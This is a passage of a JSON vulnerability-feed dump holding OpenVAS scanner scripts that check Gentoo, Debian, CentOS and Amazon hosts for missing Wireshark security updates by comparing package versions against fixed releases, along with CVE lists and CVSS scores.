rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"wireshark-debuginfo\", rpm:\"wireshark-debuginfo~1.2.15~2.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:31", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-02.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-02 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0024", "CVE-2010-2285", "CVE-2011-1142", "CVE-2011-1592", "CVE-2011-2174", "CVE-2011-3482", "CVE-2010-2284", "CVE-2010-2287", "CVE-2011-2175", "CVE-2011-1590", "CVE-2011-3360", "CVE-2011-1959", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-0444", "CVE-2010-2992", "CVE-2010-4300", "CVE-2010-3133", "CVE-2011-3483", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2011-0713", "CVE-2011-1957", "CVE-2010-4301", "CVE-2011-1141", "CVE-2010-3445", "CVE-2011-1143", "CVE-2010-4538", "CVE-2011-3266", "CVE-2010-2993", "CVE-2011-1139", "CVE-2011-1956", "CVE-2011-1140", "CVE-2010-2994", "CVE-2011-0538", "CVE-2011-1958", "CVE-2011-1138", "CVE-2011-1591", "CVE-2011-0445"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:136141256231070765", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_02.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70765\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3133\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\", \"CVE-2010-4538\", \"CVE-2011-0024\", \"CVE-2011-0444\", \"CVE-2011-0445\", \"CVE-2011-0538\", \"CVE-2011-0713\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-1140\", \"CVE-2011-1141\", \"CVE-2011-1142\", \"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\", \"CVE-2011-1956\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-3266\", \"CVE-2011-3360\", \"CVE-2011-3482\", \"CVE-2011-3483\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:38 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-02 (wireshark)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Wireshark allow for the remote\n execution of arbitrary code, or a Denial of Service condition.\");\n script_tag(name:\"solution\", value:\"All Wireshark users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/wireshark-1.4.9'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-02\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=323859\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=330479\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=339401\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=346191\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=350551\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354197\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=357237\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=363895\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=369683\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=373961\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=381551\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=383823\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=386179\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-02.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"net-analyzer/wireshark\", unaffected: make_list(\"ge 1.4.9\"), vulnerable: make_list(\"lt 1.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:48", "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-02.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-02 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0024", "CVE-2010-2285", "CVE-2011-1142", "CVE-2011-1592", "CVE-2011-2174", "CVE-2011-3482", "CVE-2010-2284", "CVE-2010-2287", "CVE-2011-2175", "CVE-2011-1590", "CVE-2011-3360", "CVE-2011-1959", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-0444", "CVE-2010-2992", "CVE-2010-4300", "CVE-2010-3133", "CVE-2011-3483", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2011-0713", "CVE-2011-1957", "CVE-2010-4301", "CVE-2011-1141", "CVE-2010-3445", "CVE-2011-1143", "CVE-2010-4538", "CVE-2011-3266", "CVE-2010-2993", "CVE-2011-1139", "CVE-2011-1956", "CVE-2011-1140", "CVE-2010-2994", "CVE-2011-0538", "CVE-2011-1958", "CVE-2011-1138", "CVE-2011-1591", "CVE-2011-0445"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70765", "href": "http://plugins.openvas.org/nasl.php?oid=70765", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Wireshark allow for the remote\n execution of arbitrary code, or a Denial of Service condition.\";\ntag_solution = \"All Wireshark users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/wireshark-1.4.9'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=323859\nhttp://bugs.gentoo.org/show_bug.cgi?id=330479\nhttp://bugs.gentoo.org/show_bug.cgi?id=339401\nhttp://bugs.gentoo.org/show_bug.cgi?id=346191\nhttp://bugs.gentoo.org/show_bug.cgi?id=350551\nhttp://bugs.gentoo.org/show_bug.cgi?id=354197\nhttp://bugs.gentoo.org/show_bug.cgi?id=357237\nhttp://bugs.gentoo.org/show_bug.cgi?id=363895\nhttp://bugs.gentoo.org/show_bug.cgi?id=369683\nhttp://bugs.gentoo.org/show_bug.cgi?id=373961\nhttp://bugs.gentoo.org/show_bug.cgi?id=381551\nhttp://bugs.gentoo.org/show_bug.cgi?id=383823\nhttp://bugs.gentoo.org/show_bug.cgi?id=386179\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-02.\";\n\n \n \nif(description)\n{\n script_id(70765);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2992\", \"CVE-2010-2993\", \"CVE-2010-2994\", \"CVE-2010-2995\", \"CVE-2010-3133\", \"CVE-2010-3445\", \"CVE-2010-4300\", \"CVE-2010-4301\", \"CVE-2010-4538\", \"CVE-2011-0024\", \"CVE-2011-0444\", \"CVE-2011-0445\", \"CVE-2011-0538\", \"CVE-2011-0713\", \"CVE-2011-1138\", \"CVE-2011-1139\", \"CVE-2011-1140\", \"CVE-2011-1141\", \"CVE-2011-1142\", \"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1591\", \"CVE-2011-1592\", \"CVE-2011-1956\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-3266\", \"CVE-2011-3360\", \"CVE-2011-3482\", \"CVE-2011-3483\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:38 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-02 (wireshark)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"net-analyzer/wireshark\", unaffected: make_list(\"ge 1.4.9\"), vulnerable: make_list(\"lt 1.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:53", "description": "The remote host is missing an update to wireshark\nannounced via advisory DSA 2274-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2274-1 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2011-2175", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-1957", "CVE-2011-1958"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:69984", "href": "http://plugins.openvas.org/nasl.php?oid=69984", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2274_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2274-1 (wireshark)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Huzaifa Sidhpurwala, David Maciejak and others discovered several\nvulnerabilities in the X.509if and DICOM dissectors and in the code to\nprocess various capture and dictionary files, which could lead to denial\nof service or the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-3+lenny14.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.11-6+squeeze2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.17-1\n\nWe recommend that you upgrade your wireshark packages.\";\ntag_summary = \"The remote host is missing an update to wireshark\nannounced via advisory DSA 2274-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202274-1\";\n\n\nif(description)\n{\n script_id(69984);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\");\n script_name(\"Debian Security Advisory DSA 2274-1 (wireshark)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-dbg\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:37", "description": "The remote host is missing an update to wireshark\nannounced via advisory DSA 2274-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2274-1 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2011-2175", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-1957", "CVE-2011-1958"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231069984", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069984", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2274_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2274-1 (wireshark)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69984\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\");\n script_name(\"Debian Security Advisory DSA 2274-1 (wireshark)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202274-1\");\n script_tag(name:\"insight\", value:\"Huzaifa Sidhpurwala, David Maciejak and others discovered several\nvulnerabilities in the X.509if and DICOM dissectors and in the code to\nprocess various capture and dictionary files, which could lead to denial\nof service or the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-3+lenny14.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.11-6+squeeze2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.17-1\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your wireshark packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to wireshark\nannounced via advisory DSA 2274-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.0.2-3+lenny14\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-dbg\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.2.11-6+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for wireshark CESA-2012:0509 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2012-0066", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2011-1143", "CVE-2011-1958"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for wireshark CESA-2012:0509 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018591.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881173\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:32:44 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\",\n \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\",\n \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\",\n \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0509\");\n script_name(\"CentOS Update for wireshark CESA-2012:0509 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wireshark'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"wireshark on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Wireshark is a program for monitoring network traffic. Wireshark was\n previously known as Ethereal.\n\n Several flaws were found in Wireshark. If Wireshark read a malformed packet\n off a network or opened a malicious dump file, it could crash or, possibly,\n execute arbitrary code as the user running Wireshark. (CVE-2011-1590,\n CVE-2011-4102, CVE-2012-1595)\n\n Several denial of service flaws were found in Wireshark. Wireshark could\n crash or stop responding if it read a malformed packet off a network, or\n opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958,\n CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698,\n CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\n Users of Wireshark should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running instances of\n Wireshark must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~2.el6_2.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.2.15~2.el6_2.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-gnome\", rpm:\"wireshark-gnome~1.2.15~2.el6_2.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-03T10:58:04", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for wireshark CESA-2012:0509 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2012-0066", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2011-1143", "CVE-2011-1958"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:881173", "href": "http://plugins.openvas.org/nasl.php?oid=881173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for wireshark CESA-2012:0509 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks 